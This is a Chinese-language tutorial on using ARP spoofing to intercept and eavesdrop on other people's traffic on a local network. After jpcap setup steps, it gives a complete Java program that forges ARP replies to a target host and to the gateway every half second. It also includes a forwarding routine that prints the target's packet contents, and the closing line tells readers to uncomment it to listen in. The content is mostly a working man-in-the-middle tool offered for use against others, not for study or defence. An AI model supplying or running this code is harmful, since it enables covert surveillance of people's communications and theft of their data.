ARP欺骗在局域网内拦截和窃听他人通讯

使用jpcap。下载链接为http://pan.baidu.com/s/1jG5wLHs。内含对应的jar和dll。

配置方法：

在windows 64位中（amd 和英特尔均可），下载jpcap安装包。需要提前安装winpcap。

配置Jpcap路径：这一步也是最重要的一步。具体路径为，把Jpcap文件夹下lib文件夹里的Jpcap.dll复制到"C:\Program Files\Java\jre1.6.0_07\bin"文件夹里面（复制到你机器JRE文件夹放到bin文件夹里面就可以了，其中JRE的版本一定要与Eclipse配置的版本一致），再把Jpcap文件夹下lib文件夹里的Jpcap.jar复制到"C:\Program Files\Java\jre1.6.0_07\lib\ext"文件夹里面（复制到你机器JRE文件夹->lib->ext放到ext文件夹里面就可以了）。
      

然后配置Eclipse的JRE环境，（一定需要），选择Window->preferences->Java->Installed JREs,在Installed JREs选择框中选择相应的JRE版本，点Edit，选择Add External JARs…,选择你的Jpcap.jar包（"C:\Program Files\Java\jre1.6.0_07\lib\ext"文件夹里），在Finish就配置全部完成了；

在eclipse中代码如下

import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;

import jpcap.JpcapCaptor;
import jpcap.JpcapSender;
import jpcap.NetworkInterface;
import jpcap.packet.ARPPacket;
import jpcap.packet.EthernetPacket;
import jpcap.packet.IPPacket;
import jpcap.packet.Packet;
import jpcap.packet.TCPPacket;






public class ChangeARP {
	private NetworkInterface[] devices;
	private NetworkInterface device;
	private JpcapCaptor jpcap;
	private JpcapSender sender;
	private ARPPacket arpTarget,arpGate;
	private byte[] targetMAC,gateMAC;
	private String targetIP,gateIP;
	
	private void getDevice() throws IOException{
		devices = JpcapCaptor.getDeviceList();
		//may not have only one devices
		device = devices[0];
		jpcap = JpcapCaptor.openDevice(device, 2000, false, 10000);
		jpcap.setFilter("ip", true);
		sender = jpcap.getJpcapSenderInstance();		
	}
	
	public ChangeARP(byte[] targetMAC,String targetIP,byte[] gateMAC,String gateIP)
			throws UnknownHostException,InterruptedException{
		//may be buggy
		this.targetMAC = targetMAC;
		this.targetIP = targetIP;
		this.gateMAC = gateMAC;
		this.gateIP = gateIP;
		try{
			getDevice();
		}catch(IOException e){
			
		}
		
		///////////////////////////////////////////////////////
		//以下程序用于构建欺骗目标的arp包,使用自己的mac地址，冒充他人ip
		//
		//
		//////////////////////////////////////////////////////
		////////////////////建立ARP包///////////////////////////////
		arpTarget = new ARPPacket();
		//以太网类型
		arpTarget.hardtype = ARPPacket.HARDTYPE_ETHER;
		//ip类型
		arpTarget.prototype = ARPPacket.PROTOTYPE_IP;		
		//relay类型
		arpTarget.operation = ARPPacket.ARP_REPLY;
		//mac地址为6个字节
		arpTarget.hlen = 6;
		//ip地址为4个字节
		arpTarget.plen = 4;		
		arpTarget.sender_hardaddr = device.mac_address;
		arpTarget.sender_protoaddr = InetAddress.getByName(gateIP).getAddress();
		arpTarget.target_hardaddr = targetMAC;
		arpTarget.target_protoaddr = InetAddress.getByName(targetIP).getAddress();
		
		//////////////////////建立以太网包////////////////////////////////////
		EthernetPacket ethToTarget = new EthernetPacket();
		ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP;
		ethToTarget.src_mac = device.mac_address;
		ethToTarget.dst_mac = targetMAC;
		
		arpTarget.datalink = ethToTarget;
		///////////////////////////////////////////////////////
		//以下程序用于构建欺骗网关的arp包
		//
		//
		//////////////////////////////////////////////////////
		arpGate = new ARPPacket();
		arpGate.hardtype = ARPPacket.HARDTYPE_ETHER;
		arpGate.prototype = ARPPacket.PROTOTYPE_IP;
		arpGate.operation = ARPPacket.ARP_REPLY;		
		arpGate.hlen = 6;
		arpGate.plen = 4;
		arpGate.sender_hardaddr = device.mac_address;
		arpGate.sender_protoaddr = InetAddress.getByName(targetIP).getAddress();
		arpGate.target_hardaddr = gateMAC;
		arpGate.target_protoaddr = InetAddress.getByName(gateIP).getAddress();
		
		EthernetPacket ethToGate = new EthernetPacket();
		ethToGate.frametype = EthernetPacket.ETHERTYPE_ARP; 
		ethToGate.src_mac = device.mac_address; // A的MAC地址 
		ethToGate.dst_mac = gateMAC; // 网关的MAC地址  
		arpGate.datalink = ethToGate; 

        System.out.println(arpTarget);  
        System.out.println(arpGate);  
        
		///////////////////////////////////////////////////////
		//发射线程
		//
		//
		//////////////////////////////////////////////////////
        new Thread(new Runnable() {  
        	public void run() {  
        		while (true) {  
        			sender.sendPacket(arpTarget);  
        			sender.sendPacket(arpGate);  
        			System.out.println("hahahahaahah");
                    try {  
                    	Thread.sleep(500);  
                    } catch (InterruptedException e) {  
                    	e.printStackTrace();  
                    }  
        		}  
        	}  
        }).start();  
        //recP();//接收数据并转发
	}
	
	///////////////////////////////////////////////////////
	//用于转发数据
	//
	//
	//////////////////////////////////////////////////////
	public void recP(){
		IPPacket ipPacket = null;
		while(true){
			ipPacket = (IPPacket)jpcap.getPacket();
			if(ipPacket == null)
				continue;
			
			if(ipPacket.src_ip.getHostAddress().equals(targetIP)){
				System.out.println(ipPacket);
				System.out.println(new String(ipPacket.data));				
			}
			
			if(ipPacket.src_ip.getHostAddress().equals(targetIP)){
				send(ipPacket,gateMAC);
			}else{
				send(ipPacket,targetMAC);
			}						
		}		
	}
	///////////////////////////////////////////////////////
	//用于发射
	//
	//
	//////////////////////////////////////////////////////
	private void send(Packet packet,byte[] changeMac){
		EthernetPacket eth;
		if(packet.datalink instanceof EthernetPacket){
			eth = (EthernetPacket)packet.datalink;
			for(int i=0;i<6;i++){
				eth.dst_mac[i]=changeMac[i];
				eth.src_mac[i]=device.mac_address[i];
			}
			sender.sendPacket(packet);
		}
		
	}
			
	
	public static void main(String[] args)throws Exception{
		byte[] targetMAC = new byte[6];
        targetMAC[0] = (byte) 0x6c;  
        targetMAC[1] = (byte) 0x62;  
        targetMAC[2] = (byte) 0x6d;  
        targetMAC[3] = (byte) 0x3c;  
        targetMAC[4] = (byte) 0xab;  
        targetMAC[5] = (byte) 0x77; 

		byte[] gateMAC = new byte[6];
        gateMAC[0] = (byte) 0x68;  
        gateMAC[1] = (byte) 0xbd;  
        gateMAC[2] = (byte) 0xab;  
        gateMAC[3] = (byte) 0x33;  
        gateMAC[4] = (byte) 0xff;  
        gateMAC[5] = (byte) 0x80;

		
		
		
		String targetIP = "192.168.48.14";
		String gateIP = "192.168.48.1";
		System.out.println(System.getProperty("java.library.path"));
		ChangeARP temp = new ChangeARP(targetMAC,targetIP,gateMAC,gateIP);		
	}

}

如果要监听对方通信，请将recp前的注释取消掉。